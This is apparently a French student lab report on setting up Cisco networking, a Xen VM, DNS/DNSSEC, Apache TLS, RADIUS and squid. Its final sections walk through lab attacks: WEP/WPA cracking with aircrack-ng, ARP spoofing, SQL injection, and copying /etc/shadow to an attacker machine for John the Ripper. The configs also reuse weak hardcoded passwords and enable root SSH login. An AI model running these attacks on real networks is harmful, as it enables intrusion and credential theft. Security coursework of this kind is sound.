SE2A5-R2(config-if-vrrp)#preempt
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit
- Interface vers le point d'accès Wifi :
SE2A5-R2(config)#interface g1/0/3
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode trunk
SE2A5-R2(config-if)#switchport trunk allowed vlan 1
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
ap>enable
ap#configure terminal
- Configuration du nom d’hôte :
ap(config)#hostname SE2A5-AP1
- Accès SSH :
SE2A5-AP1(config)#aaa new-model
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
SE2A5-AP1(config)#ip domain-name plil.info
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
SE2A5-AP1(config)#ip ssh version 2
SE2A5-AP1(config)#line vty 0 15
SE2A5-AP1(config-line)#transport input ssh
SE2A5-AP1(config-line)#exit
- Accès console :
SE2A5-AP1(config)#line console 0
SE2A5-AP1(config-line)#password glopglop
SE2A5-AP1(config-line)#login authentification default
SE2A5-AP1(config-line)#exit
- Sécurisation des accès :
SE2A5-AP1(config)#service password-encryption
SE2A5-AP1(config)#enable secret glopglop
SE2A5-AP1(config)#banner motd #Restricted Access#
- VLAN n°1 :
SE2A5-AP1(config)#interface BVI 1
SE2A5-AP1(config-if)#ip address 10.60.101.1 255.255.255.0
SE2A5-AP1(config-if)#no shutdown
SE2A5-AP1(config-if)#exit
SE2A5-AP1(config)#ip default-gateway 10.60.101.254
- Configuration Wifi EAP :
SE2A5-AP1(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
SE2A5-AP1(config)#radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
SE2A5-AP1(config)#aaa group server radius RADIUS_DEMINEUR
SE2A5-AP1(config-server)#server 10.60.100.164 auth-port 1812 acct-port 1813
SE2A5-AP1(config-server)#exit
SE2A5-AP1(config)#dot11 ssid DEMINEUR1
SE2A5-AP1(config-ssid)#mbssid guest-mode
SE2A5-AP1(config-ssid)#vlan 164
SE2A5-AP1(config-ssid)#authentication open eap EAP_DEMINEUR
SE2A5-AP1(config-ssid)#authentication network-eap EAP_DEMINEUR
SE2A5-AP1(config-ssid)#authentication key-management wpa
SE2A5-AP1(config-ssid)#exit
SE2A5-AP1(config)#interface dot11radio0.164
SE2A5-AP1(config-subif)#encapsulation dot1q 164
SE2A5-AP1(config-subif)#bridge-group 64
SE2A5-AP1(config-subif)#exit
SE2A5-AP1(config)#interface g0.164
SE2A5-AP1(config-subif)#encapsulation dot1q 164
SE2A5-AP1(config-subif)#bridge-group 64
SE2A5-AP1(config-subif)#exit
SE2A5-AP1(config)#interface dot11radio 0
SE2A5-AP2(config-if)#no shutdown
SE2A5-AP1(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
SE2A5-AP1(config-if)#mbssid
SE2A5-AP1(config-if)#ssid DEMINEUR1
SE2A5-AP1(config-if)#exit
On considère la commande ci-dessous de la configuration précédente :
radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
Cette commande permet au PA de se connecter au serveur freeradius
sur la VM afin de vérifier qu'un utilisateur se connecte avec les bons identifiants.
Le mot de passe glopglop
qui est spécifié sera également à définir dans les clients freeradius
sur la VM.
L'accès SSH au PA nécessite de spécifier l'utilisation de l'algorithme de Diffie-Hellman et le chiffrement AES-128 :
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc [email protected]
ap>enable
ap#configure terminal
- Configuration du nom d’hôte :
ap(config)#hostname SE2A5-AP2
- Accès SSH :
SE2A5-AP2(config)#aaa new-model
SE2A5-AP2(config)#username admin privilege 15 secret glopglop
SE2A5-AP2(config)#ip domain-name plil.info
SE2A5-AP2(config)#crypto key generate rsa general-keys modulus 2048
SE2A5-AP2(config)#ip ssh version 2
SE2A5-AP2(config)#line vty 0 15
SE2A5-AP2(config-line)#transport input ssh
SE2A5-AP2(config-line)#exit
- Accès console :
SE2A5-AP2(config)#line console 0
SE2A5-AP2(config-line)#password glopglop
SE2A5-AP2(config-line)#login authentification default
SE2A5-AP2(config-line)#exit
- Sécurisation des accès :
SE2A5-AP2(config)#service password-encryption
SE2A5-AP2(config)#enable secret glopglop
SE2A5-AP2(config)#banner motd #Restricted Access#
- VLAN n°1 :
SE2A5-AP2(config)#interface BVI 1
SE2A5-AP2(config-if)#ip address 10.60.101.2 255.255.255.0
SE2A5-AP2(config-if)#no shutdown
SE2A5-AP2(config-if)#exit
SE2A5-AP2(config)#ip default-gateway 10.60.101.254
- Configuration Wifi EAP :
SE2A5-AP2(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
SE2A5-AP2(config)#radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
SE2A5-AP2(config)#aaa group server radius RADIUS_DEMINEUR
SE2A5-AP2(config-server)#server 10.60.100.164 auth-port 1812 acct-port 1813
SE2A5-AP2(config-server)#exit
SE2A5-AP2(config)#dot11 ssid DEMINEUR2
SE2A5-AP2(config-ssid)#mbssid guest-mode
SE2A5-AP2(config-ssid)#vlan 164
SE2A5-AP2(config-ssid)#authentication open eap EAP_DEMINEUR
SE2A5-AP2(config-ssid)#authentication network-eap EAP_DEMINEUR
SE2A5-AP2(config-ssid)#authentication key-management wpa
SE2A5-AP2(config-ssid)#exit
SE2A5-AP2(config)#interface dot11radio0.164
SE2A5-AP2(config-subif)#encapsulation dot1q 164
SE2A5-AP2(config-subif)#bridge-group 64
SE2A5-AP2(config-subif)#exit
SE2A5-AP2(config)#interface g0.164
SE2A5-AP2(config-subif)#encapsulation dot1q 164
SE2A5-AP2(config-subif)#bridge-group 64
SE2A5-AP2(config-subif)#exit
SE2A5-AP2(config)#interface dot11radio 0
SE2A5-AP2(config-if)#no shutdown
SE2A5-AP2(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
SE2A5-AP2(config-if)#mbssid
SE2A5-AP2(config-if)#ssid DEMINEUR2
SE2A5-AP2(config-if)#exit
- Connexion au serveur Capbreton :
ssh capbreton.plil.info
- Créer la variable d'environnement
http_proxy
:
export http_proxy=http://proxy.plil.fr:3128
En configurant correctement le proxy de la plateforme, il est désormais possible d'accéder aux images et aux paquets Debian pour créer la VM.
- Création d’une image pour la VM :
xen-create-image --hostname=demineur --ip=10.60.100.164 --gateway=10.60.100.254 --netmask=255.255.255.0 --dir=/usr/local/xen --password=glopglop --dist=buster
→ Dossier de stockage des données de la VM : /usr/local/xen/domains/demineur
→ Fichier de configuration de la VM : /etc/xen/demineur.cfg
- Création des partitions virtuelles :
vgcreate virtual /dev/sda7
lvcreate -L10G -n demineur-home virtual
lvcreate -L10G -n demineur-var virtual
- Vérification des partitions :
lvdisplay
lsblk
- Formatage de la partition virtuelle :
mkfs.ext4 /dev/virtual/demineur-home
mkfs.ext4 /dev/virtual/demineur-var
- Modification de
/etc/xen/demineur.cfg
:
→ Ajout des partitions virtuelles dans la variable disk
:
'phy:/dev/virtual/demineur-home,xvda3,w',
'phy:/dev/virtual/demineur-var,xvda4,w'
→ Ajout du pont dans dans la variable vif
:
vif = [ 'mac=00:16:3E:D8:97:68, bridge=IMA2a5' ]
Le fichier de configuration obtenu est le suivant :
#
# Configuration file for the Xen instance demineur, created
# by xen-tools 4.8 on Fri Nov 12 08:53:11 2021.
#
#
# Kernel + memory size
#
kernel = '/boot/vmlinuz-4.19.0-9-amd64'
extra = 'elevator=noop'
ramdisk = '/boot/initrd.img-4.19.0-9-amd64'
vcpus = '1'
memory = '256'
#
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/demineur/disk.img,xvda2,w',
'file:/usr/local/xen/domains/demineur/swap.img,xvda1,w',
'phy:/dev/virtual/demineur-home,xvda3,w',
'phy:/dev/virtual/demineur-var,xvda4,w'
]
#
# Physical volumes
#
#
# Hostname
#
name = 'demineur'
#
# Networking
#
vif = [ 'mac=00:16:3E:BE:BF:2D, bridge=IMA2a5' ]
#
# Behaviour
#
on_poweroff = 'destroy'
on_reboot = 'restart'
on_crash = 'restart'
- Création de la VM :
xl create /etc/xen/demineur.cfg
- Affichage de l’état des VM :
xl list
- Affichage du mot de passe de la VM :
tail -f /var/log/xen-tools/demineur.log
- Démarrage d'un shell sur la VM :
xen console demineur
- Changement du mot de passe :
passwd root
- Mise à jour de la liste des paquets :
apt update
- Montage des partitions virtuelles :
mount /dev/xvda4 /mnt
- Copie des données des répertoires
/home
et/var
:
mv /var/* /mnt
- Démontage des partitions virtuelles :
umount /mnt
- Ajout des partitions au fichier
/etc/fstab
:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2
- Modification du fichier
/etc/ssh/sshd_config
:
PermitRootLogin yes
- Modification du fichier
/etc/network/interfaces
:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet6 auto
iface eth0 inet static
address 10.60.100.164/24
up ip address add dev eth0 193.48.57.164/32
up ip route add default via 10.60.100.254 src 193.48.57.164
down ip address del dev eth0 193.48.57.164/32
down ip route del default via 10.60.100.254 src 193.48.57.164
Dans un premier temps, on utilise le registrar Gandi afin de réserver le nom de domaine demineur.site
.
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :
→ Ajouter le Glue Record vers 193.48.57.164
afin d'associer le nom de domaine demineur.site
à l'adresse IP 193.48.57.164
→ Modifier les serveurs de noms pour utiliser ns.demineur.site
et ns6.gandi.net
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :
→ Modifier l'enrgistrement DNS @
-A
avec la valeur 193.48.57.193
→ Ajouter l'enrgistrement DNS ns
-A
avec la valeur 193.48.57.193
→ Modifier l'enrgistrement DNS www
-CNAME
avec la valeur ns.demineur.site.
- Installation du paquet
bind9
apt install bind9
- Modification du fichier
/etc/resolv.conf
:
nameserver 127.0.0.1
- Modification du fichier
/etc/bind/named.conf.local
:
zone "demineur.site" {
type master;
file "/etc/bind/db.demineur.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};
- Modification du fichier
/etc/bind/named.conf.options
:
options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};
- Créer le fichier BIND pour
demineur.site
:
cp /etc/bind/db.local /etc/bind/db.demineur.site
- Modification du fichier
/etc/bind/db.demineur.site
:
;
; BIND data file for demineur.site
;
$TTL 604800
@ IN SOA ns.demineur.site. root.demineur.site. (
1 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.demineur.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.164
NS IN A 193.48.57.164
NS IN AAAA 2001:7A8:116E:60A0:216:3eff:febe:bf2d
; NS IN AAAA 2001:7A8:116E:60A4::1
WWW IN CNAME NS
SSH IN CNAME NS
- Redémarrage du service
bind9
:
service bind9 restart
- Modification du fichier
/etc/resolv.conf
nameserver 193.48.57.164
- Vérification de la traduction du nom de domaine
demineur.site
:
nslookup demineur.site
- Installation du paquet
openssl
:
apt install openssl
- Création d'un certificat TSL :
openssl req -nodes -newkey rsa:2048 -sha256 -keyout demineur.site.key -out demineur.site.csr
Attention à bien renseigner demineur.site
comme CN (Common Name) pour la création du certificat.
mv demineur.site.key /etc/ssl/private
mv demineur.site.csr /etc/ssl/certs
Il est nécessaire de faire signer le certificat .csr
par un registrar tel que Let's Encrypt ou Gandi afin d'en obtenir le nouveau certificat signé .crt
.
Puisque le registrar Gandi a été utilisé pour réserver le nom de domaine demineur.site
, il est alors possible d'utiliser à nouveau ce service pour signer gratuitement le certificat demineur.site.csr
.
Pour cela, il faut "acheter" un certificat SSL pour un hôte "ailleurs" et coller le contenu du fichier .csr
. Une fois le CN entré et reconnu, l'achat devient gratuit et peut être effectué.
Après quelques minutes, il est désormais possible de télécharger le certificat signé .crt
ainsi que le certificat nommé GandiStandardSSLCA2.pem
.
Ces deux certificats sont à copier dans le répertoire /etc/ssl/certs
de la VM.
- Copier les certificats sur la VM :
scp -r -p demineur.site.crt [email protected]:/etc/ssl/certs
scp -r -p GandiStandardSSLCA2.pem [email protected]:/etc/ssl/certs
- Installation du paquet
apache2
:
apt install apache2
- Activation du module SSL :
a2enmod ssl
- Modification du fichier
/etc/apache2/ports.conf
:
Listen 80
<IfModule mod_ssl.c>
Listen 443
</IfModule>
<IfModule mod_gnutls.c>
Listen 443
</IfModule>
- Ajout du fichier
/etc/apache2/sites-available/000-demineur.site-ssl.conf
:
<IfModule mod_ssl.c>
<VirtualHost 193.48.57.164:443>
ServerName demineur.site
ServerAlias ns.demineur.site www.demineur.site
DocumentRoot /var/www/demineur.site/
CustomLog /var/log/apache2/secure_access.log combined
SSLEngine on
SSLCertificateFile /etc/ssl/certs/demineur.site.crt
SSLCertificateKeyFile /etc/ssl/private/demineur.site.key
SSLCACertificateFile /etc/ssl/certs/GandiStandardSSLCA2.pem
SSLVerifyClient None
</VirtualHost>
</IfModule>
- Activation du site
demineur.site
:
a2ensite 000-demineur.site-ssl
- Modification du fichier
nano /etc/apache2/apache2.conf
:
ServerName demineur.site
- Modification du fichier
nano /etc/apache2/sites-available/000-default.conf
:
Redirect permanent / https://www.demineur.site/
- Redémarrage du service
apache2
:
service apache2 restart
- Modification du fichier
/etc/bind/named.conf.options
:
dnssec-enable yes;
dnssec-validation yes;
dnssec-lookaside auto;
- Création du répertoire
demineur.site.dnssec
:
mkdir /etc/bind/demineur.site.dnssec/
cd /etc/bind/demineur.site.dnssec/
- Génération de la clef asymétrique de signature de clefs de zone :
dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE demineur.site
mv Kdemineur.site.*.key demineur.site-ksk.key
mv Kdemineur.site.*.private demineur.site-ksk.private
- Génération de la clef asymétrique de signature des enregistrements :
dnssec-keygen -a RSASHA256 -b 2048 -n ZONE demineur.site
mv Kdemineur.site.*.key demineur.site-zsk.key
mv Kdemineur.site.*.private demineur.site-zsk.private
- Modification du fichier
/etc/bind/db.demineur.site
:
$include "/etc/bind/demineur.site.dnssec/demineur.site-ksk.key"
$include "/etc/bind/demineur.site.dnssec/demineur.site-zsk.key"
- Signature des enregistrements de la zone :
dnssec-signzone -o demineur.site -k demineur.site-ksk ../db.demineur.site demineur.site-zsk
- Modification du fichier
/etc/bind/named.conf.local
:
zone "demineur.site" {
type master;
file "/etc/bind/db.demineur.site.signed";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier demineur.site-ksk.key
) à Gandi.
L'algorithme utilisé est le 5 (RSA/SHA-1).
cd /etc/bind/
dnssec-verify -o demineur.site db.demineur.site.signed
service bind9 restart
Le serveur RADIUS permet l'authentification des utilisateurs qui se connectent aux points d'accès Wifi (WPA-EAP).
- Installer le paquet
freeradius
:
apt install freeradius
- Modifier le fichier
/etc/freeradius/3.0/clients.conf
:
client PA1 {
ipaddr = 10.60.101.1
secret = glopglop
}
client PA2 {
ipaddr = 10.60.101.2
secret = glopglop
}
- Ajouter un utilisateur en modifiant le fichier
/etc/freeradius/3.0/users
:
pifou Cleartext-Password := "pasglop"
- Modifier le fichier
/etc/freeradius/3.0/mods-enables/eap
:
eap {
default_eap_type = peap
...
}
- Arrêter le service
freeradius
durant la phase de tests :
service freeradius stop
- Démarrer
freeradius
en mode debug :
freeradius -X
Pendant que freeradius
est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.
- Redémarrer le service
freeradius
:
service freeradius start
Pour permettre aux utilisateurs connectés aux réseaux Wifi d'avoir un accès à Internet, on configure un serveur mandataire (proxy).
- Installer le paquet
squid
:
apt install squid
- Faire une sauvegarde de la configuration de
squid
:
cp /etc/squid/squid.conf /etc/squid/squid.conf.bak
- Nettoyer le fichier de configuration de
squid
en retirant les commentaires :
grep -vE "^#|^$" /etc/squid/squid.conf.bak > /etc/squid/squid.conf
- Modifier le fichier de configuration de
squid
:
vi /etc/squid/squid.conf
- Ajouter en dessous de la ligne
acl localhost src
une liste d'accès pour autoriser le réseau privé à utiliser le proxy :
acl allowedips src 10.60.164.0/24
- Ajouter la ligne suivante en dessous de la ligne
http_access allow localhost
:
http_access allow allowedips
- Configurer le nom de la machine :
visible_hostname demineur
- Ne pas inclure l'adresse IP dans les requêtes HTTP :
forwarded_for off
-
Sauvegarder et quitter le fichier de configuration
-
Redémarrage du service
squid
:
service squid restart
Afin de sécuriser les données, on configure un RAID5 avec les trois partition LVM de 1Go créées précédemment.
- Installer les paquets nécessaires :
apt install mdadm
- Créer les partitions virtuelles pour le RAID :
lvcreate -L1G -n demineur-raid-1 virtual
lvcreate -L1G -n demineur-raid-2 virtual
lvcreate -L1G -n demineur-raid-3 virtual
- Ajouter les partitions à la configuration de la VM :
'phy:/dev/virtual/demineur-raid-1,xvdb1,w',
'phy:/dev/virtual/demineur-raid-2,xvdb2,w',
'phy:/dev/virtual/demineur-raid-3,xvdb3,w'
- Créer le RAID5 à l'aide de la commande
mdadm
:
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3
- Formater la partition RAID5 :
mkfs.ext4 /dev/md0
- Ajout de la partition au fichier
/etc/fstab
:
/dev/md0 /media/raid ext4 defaults 0 1
- On recharge les partitions afin de prendre en compte le RAID :
mount -a
On connecte une clef USB sur laquelle on crée une partition chiffrée.
- Installation des paquets nécessaires :
apt install lvm2 cryptsetup
- Créer une partition
sdb1
sur la clef USBsdb
:
fdisk /dev/sdb
→ entrer n
pour créer une nouvelle partition
→ entrer p
pour créer une partition primaire
→ entrer le numéro de la partition
→ début de la partition : laisser par défaut
→ fin de la partition : laisser par défaut (prend tout l'espace disponible)
→ w
pour ecrire
- Informer le kernel que la table des partitions a changé :
partprobe
- Initialisation du chiffrement LUKS de la partition :
cryptsetup create home /dev/sdb1 --type luks
Le chiffrement LUKS montre à l'utilisateur qu'il s'agit d'une partition chiffrée.
Il faut plutôt utiliser le chiffrement PLAIN qui permet de masquer ces informations.
cryptsetup create home /dev/sdb1 --type plain
- Formatage de la partition :
cryptsetup open --type {plain|luks} /dev/sdb1 home
mkfs.ext4 /dev/mapper/home
cryptsetup close home
- Montage de la partition :
cryptsetup open --type {plain|luks} /dev/sdb1 home
mount /dev/mapper/home /mnt
- Ajout de fichiers sur la clef :
echo "test" > /mnt/test
- Démontage de la clef USB :
umount /mnt
cryptsetup close home
En reconnectant à nouveau la clef, on peut lire le fichier.
- Installer Docker :
sudo apt install docker.io
- Créer un fichier de configuration
Dockerfile
:
FROM httpd:latest
WORKDIR /usr/local/apache2/htdocs
COPY src/ .
CMD [ "httpd", "-D", "FOREGROUND" ]
- Récupérer l'image
httpd
via Docker Hub :
docker pull httpd
- Créer l'image Docker :
docker build -t apache .
- Créer un conteneur :
docker run -d --name apache apache
- Passer en mode super-utilisateur :
su -
Le paramètre -
permet de lire le fichier .bashrc
de l'utilisateur root
et d'ajouter le répertoire /sbin
à la variable d'environnement PATH
. Cela permet donc d'accéder aux multiples commandes du paquet aircrack-ng
.
- Installation des paquets nécessaires :
apt install aircrack-ng pciutils crunch
- Vérification du nom de la carte Wifi :
airmon-ng
La carte Wifi se nomme wlx40a5ef059e47
.
- Démarrer la carte Wifi en mode de surveillance (monitor mode) :
airmon-ng start wlx40a5ef059e47
Après activation du mode de surveillance, la carte Wifi se nomme wlan0mon
.
airmon-ng start wlan0mon
- Lancer une écoute de tous les paquets Wifi qui circulent afin de déterminer les paramètres du réseau Wifi à attaquer :
airodump-ng wlan0mon
Récupérer les informations suivantes :
→ BSSID - 04:DA:D2:9C:50:53
→ Canal - 3
→ SSID - cracotte04
- Réaliser un test d'injection sur le point d'accès pour vérifier que la distance entre la carte Wifi et le point d'accès est suffisante :
aireplay-ng -9 -e cracotte04 -a 04:DA:D2:9C:50:53 wlan0mon
La commande doit retourner un pourcentage proche de 100% pour réaliser l'opération.
Il faut désormais lancer deux opérations en parallèle :
→ Cibler le point d'accès avec airodump-ng
pour capturer les vecteurs d'initialisation nécessaires au cassage de la clef WEP
→ Associer la carte Wifi et le point d'accès avec aireplay-ng
(réalisé par des cartes Raspberry Pi dans la salle de TP)
- Récupérer les vecteurs d'initialisation (VI) pour l'algorithme de cassage :
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon
Les VI générés sont enregistrés dans les fichiers output*
- Associer la carte Wifi et le point d'accès (relancer si la commande s'arrête) :
aireplay-ng -1 0 -e cracotte04 -a 04:DA:D2:9C:50:53 -h 40:a5:ef:05:9e:47 wlan0mon
Le paramètre -1
permet d'effectuer de fausses authentifications dont le délai entre les demandes est 0
.
Pour cela, il est nécessaire de spécifier le BSSID de la carte Wifi utilisée pour le cassage.
Après un certain temps, un nombre suffisant de VI (entre 30k et 50k pour de 'Data' récupérées) a été capturé et la clef WEP peut alors être cassée à l'aide des fichiers output*
.
- Casser la clef WEP du point d'accès :
aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap
KEY FOUND! [ 21:34:56:78:9A:BC:05:CB:A9:87:65:43:21 ]
Decrypted correctly: 100%
- Installation du paquet
crunch
:
sudo apt install crunch
- Syntaxe de la commande :
crunch <min> <max> [options]
- Générer toutes les chaînes de quatre caractères commençant par un 'A', suivi par deux nombres et se terminant par un '2' :
crunch 4 4 -t A%%2
@
: lettres majuscules,
: lettres minuscules%
: nombres^
: symboles
- Générer un dictionnaire contenant toutes les combinaisons des caractères alpha-numériques :
crunch 2 2 -f charset.lst mixalpha-numeric
Le fichier charset.lst
contient différentes listes de caractères parmi lesquelles l'ensemble des caractères alpha-numériques :
mixalpha-numeric = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
Le contenu de ce fichier est disponible ici.
- Vérification du nom de la carte Wifi :
airmon-ng
La carte Wifi se nomme wlx40a5ef059e47
.
- Démarrer la carte Wifi en mode de surveillance (monitor mode) :
airmon-ng start wlx40a5ef059e47
airmon-ng start wlan0mon
Après activation du mode de surveillance, la carte Wifi se nomme wlan0mon
.
- Lancer une écoute de tous les paquets Wifi qui circulent afin de déterminer les paramètres du réseau Wifi à attaquer :
airodump-ng wlan0mon
Récupérer les informations suivantes :
→ BSSID - 44:AD:D9:5F:87:02
→ Canal - 3
→ SSID - kracotte03
- Cibler la recherche vers le point d'accès pour capturer les VI générés par le PA :
airodump-ng -c 3 --bssid 44:AD:D9:5F:87:02 -w psk wlan0mon
Il est nécessaire de capturer les VI issus d'un handshake (émis lors de la connexion d'un utilisateur au PA).
Pour cela, des cartes Raspberry Pi présentes dans la salle de TP se connectent aux différents réseaux Wifi WPA.
Ici, les paquets récupérés sont stockés dans des fichiers psk*
.
- Créer un dictionnaire de toutes les combinaisons décimales possibles sur 8 bits :
crunch 8 8 0123456789 -o dictionnaire
- Cassage de la PSK :
aircrack-ng -w dictionnaire -b 44:AD:D9:5F:87:02 psk*.cap
KEY FOUND! [ 90122222 ]
Master Key : 2D 1E 30 8D AA 30 91 7A 5D AB B5 80 02 FB 16 3F
9B DB 91 AC A5 76 4A 33 31 8B D3 7B AC 5A DB A7
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : E6 17 FE C7 E3 14 F0 B9 68 99 97 86 07 41 DA E8
Sur la machine qui effectue l'attaque :
- Activer le routage IPv4 :
sysctl -w net.ipv4.ip_forward=1
- Lancer l'empoisonnement du cache ARP de la victime :
arpspoof -i <Nom carte réseau> -t <Adresse IP victime> <Adresse IP passerelle>
- Vérifier la contamination du cache ARP sur la machine de la victime :
ip n
- Utiliser l'analyseur de réseau Wireshark (sniffer) pour visualiser le contenu des formulaires HTTP
- Se rendre sur un site Web avec la chaîne ci-dessous comme identifiant et mot de passe :
' OR 1 = 1 --
Soit la requête ci-dessous :
SELECT * FROM USERS WHERE ID='$id' AND PWD='$pwd'
Ainsi, l'injection SQL permet de commenter la partie de la requête pour le mot de passe et d'effectuer un OU avec une condition toujours vraie afin de récupérer toutes les informations de la base de données :
SELECT * FROM USERS WHERE ID='' OR 1 = 1 --' AND PWD='' OR 1 = 1 --'
- Installation des paquets nécessaires :
apt-get install dirb
- Analyse des fichiers du serveur Web :
dirb http://honey.plil.info
On remarque la présence du répertoire phpmyadmin
sur le serveur.
- Ouvrir l'URL
http://honey.plil.info/phpmyadmin
et essayer de se connecter avec les identifiants récupérés
- Installation des paquets nécessaires :
apt-get install nmap
- Vérifier que le serveur est accessible à distance (analyse des ports) :
nmap -6 https://<Adresse du serveur>
- Se connecter au serveur via
ssh
avec les identifiants récupérés dans la base de données :
ssh <Utilisateur>@<Adresse du serveur>
- Récupération des informations sur les utilisateurs :
scp /etc/passwd <Utilisateur pirate>@<Adresse machine pirate>:~/passwd
scp /etc/shadow <Utilisateur pirate>@<Adresse machine pirate>:~/shadow
- Utilisation des commandes de l'utilitaire de John the Ripper.
unshadow ./passwd ./shadow | grep root > pass
- Création d'un dictionnaire (on sait que le mot de passe est la répétition d'un mot de 4 lettres deux fois) :
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico
sed -i 's/\(.*\)/\1\1/' dico
- Cassage du mot de passe :
/usr/sbin/john -w:dico pass
- Visualisation du mot de passe en clair après quelques minutes :
/usr/sbin/john --show pass
- Plan d'adressage
- Architecture réseau
- Câblage des fibres
- Câblage des câbles coaxiaux
- Configuration de base des trois routeurs
- Configuration du VLAN 530 sur les deux routeurs principaux
- La communication avec le routeur en amont (
192.168.222.33
) est fonctionnelle - Le routeur répond correctement à la sollicitation ICMP par la commande PING
- La communication avec le routeur en amont (
- Configuration du VLAN 110 sur les deux routeurs principaux
- Configuration de OSPF
- Configuration de VRRP pour déterminer le routeur actif sur le réseau
- VRRP ne permet pas de choisir une adresse IP en dehors du sous-réseau déclaré
- Le sous-réseau
10.60.100.0/24
est utilisé dans le VLAN 110 pour avoir davantage d'addresses et pour pouvoir utiliser VRRP - Ce sous-réseau n'est pas redistribué via OSPF
- Configuration des routeurs Cisco 9200 et 6509-E
- Tests de connectivité avec Internet fonctionnels
- L'implémentation du protocole NAT sur le Cisco 6509-E a été effectuée
- Il a fallu ajouter la dernière adresse du réseau
193.48.57.160/28
sur l'interface loopback 0 afin d'activer la redistribution par OSPF - Les paquets ICMP et UDP sont correctement échangés mais pas ceux TCP
- Le commutateur Cisco 9200 n'implémente pas le protocole NAT
- La solution trouvée est de passer par des routes statiques
- Sauf si une solution est trouvée, le routeur Cisco 6509-E implémentera également des routes statiques plutôt que d'utiliser le protocole NAT
- Tests de connectivité avec Internet fonctionnels
- Configuration IPv6
- La redondance est fonctionnelle : Le commutateur Cisco 9200 prend le relais sur le routeur Cisco 6509-E si celui-ci ne fonctionne plus
- Configuration des interfaces vers le routeur Cisco ISR 4331 et les points d'accès
- Le routeur Cisco ISR 4331 sera connecté au commutateur SR52-pinfo-1 sur l'interface G0/39 (l'interface a été configuré pour commuter le VLAN 532)
- Configuration des routeurs Cisco 9200 et 6509-E
- Installation fonctionnelle, il faut juste trouver une solution pour les paquets UDP filtrés avec NAT (cf. ACL)
- Changement des adresses IP pour le VLAN 530 (et 532)
- Début configuration ISR 4331
- Création VM
- Partitions virtuelles
- Apache + SSL
- DNS
- RAID5
- Configuration de la VM
- Configuration DNS avec Gandi fonctionnelle
- Création du certificat SSL
- Activation du site HTTPS
- Tests d'intrusion
- Cassage de clef WEP
- Cassage de clef WPA2
- Configuration de
freeradius
et couplage au Wifi WPA-EAP - Configuration DNSSEC
- Cassage de clef WEP et WPA2
- Configuration IPv6
- Communication fonctionnelle entre les réseaux créés et ceux de la plateforme maths/info
- Communication impossible avec Internet (IPv6) à cause de la configuration des routeurs de l'université
- Configuration ISR 4331
- Configuration Wifi EAP
- Adressage DHCP fonctionnel pour les appareils Wifi
- Communication fonctionnelle entre les appareils Wifi connectés et les autres équipements
- Configuration d'un serveur Proxy pour donner aux appareils Wifi un accès à Internet
- Conversion du fichier
README.md
vers le format Wiki à l'aide de la commande :
apt install pandoc ; pandoc README.md -t mediawiki -o README.wiki
- Examen